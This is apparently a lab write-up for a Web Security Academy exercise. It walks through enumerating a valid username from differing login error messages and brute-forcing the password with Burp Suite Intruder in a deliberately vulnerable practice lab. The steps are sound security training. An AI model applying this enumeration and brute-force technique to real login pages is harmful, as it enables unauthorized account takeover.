Username enumeration via different responses

To access the lab visit the following link:

Lab: Username enumeration via different responses | Web Security Academy

This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists:

• Candidate usernames
• Candidate passwords

Target Goal

To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page.

Access the lab

Click on the given button to access the lab

Lab Access button

Lab homepage

As soon as the lab is opened we get the following homepage. On top right, we can see the my account option. Let’s click on it and see the login page.

Lab homepage

Let’s navigate to our desired login page and log in using some dummy credentials. For this example, I have used the username text and the password test. Using Burp Suite, we can capture this request to analyze it further.

I am using the default browser provided by Burp Suite. If you still need guidance on setting up Burp Suite with your browser to intercept requests, you can check the detailed write-up here:

Capturing and Analysing Requests in Burp Suite: A Beginner’s Guide

logging in with dummy credentials

When we capture a login request in Burp Suite, we can click on the request to view its details. This allows us to examine both the content of the request and the corresponding response in the adjacent panel.

captured request and its response

We can render the captured request. Upon inspection, we notice that the response indicates an “invalid username” error message.

It provides critical information about how the application handles login attempts. This message suggests that the application is validating the username before checking the password, which can be an important indicator for potential vulnerability.

This distinct “invalid username” message allows us to determine valid and invalid usernames by submitting various usernames and observing the responses.

Brute forcing username

So, let’s brute force username through burp intruder.

• Right-click on the captured request and select “Send to Intruder” from the context menu.
• Ensure the attack type is set to “Sniper”. This is the default attack type and it is suitable for single parameter testing like this.
• Go to the Intruder tab and in “Positions” sub-tab. You’ll see the request.
• Click on “Clear §” to remove all the automatic payload positions. Highlight the value of the username parameter.
• Click on “Add §” to mark this value as a payload position. It will be surrounded by § symbols.

Intruder tab

• Navigate to the “Payloads” tab in Intruder. you can see the Payload tab in the intruder section as shown below.

• In the “Payload Sets” section, make sure “Payload set 1” is selected, corresponding to the position you marked.
• Under “Payload Options”, select “Simple list”.
• Copy the list of usernames provided on the lab page and and click paste in the payload settings.
• You can also save the list of usernames in a text file and load a list of usernames from a file by clicking on “Load”.

setting payload

• Once your payloads are configured, click on the “Start attack” button.
• Burp Suite will start sending requests with each username in your list and display the results in the Intruder tab.

We notice that one of the responses differs slightly in length compared to the others. When we render this particular response, it indicates “incorrect password.” This implies that the username sent in this request is valid.

username found

We have identified the correct username. Let’s get back to the intruder tab.

• Click on “Clear §” to remove all the automatic payload positions. Highlight the value of the password parameter.
• Click on “Add §” to mark this value as a payload position. It will be surrounded by § symbols.

Adding payload position to password

• Copy the list of passwords provided on the lab page and and click paste in the payload settings.
• You can also save the list of passwords in a text file and load a list of passwords from a file by clicking on “Load”.
• Once your payloads are configured, click on the “Start attack” button.

loading passwords list

• Burp Suite will start sending requests with each password in your list and display the results in the Intruder tab.
• Once the attack is complete, you will notice that one of the requests returned a 302 status code. This indicates that the password may be correct.

Identified password

Use the identified username and password to log in. Once successfully logged in, the lab will be marked as solved.

Congratulations! The walkthrough of first authentication lab finishes here.

You can see walkthrough of second lab by clicking the following link:

2FA simple bypass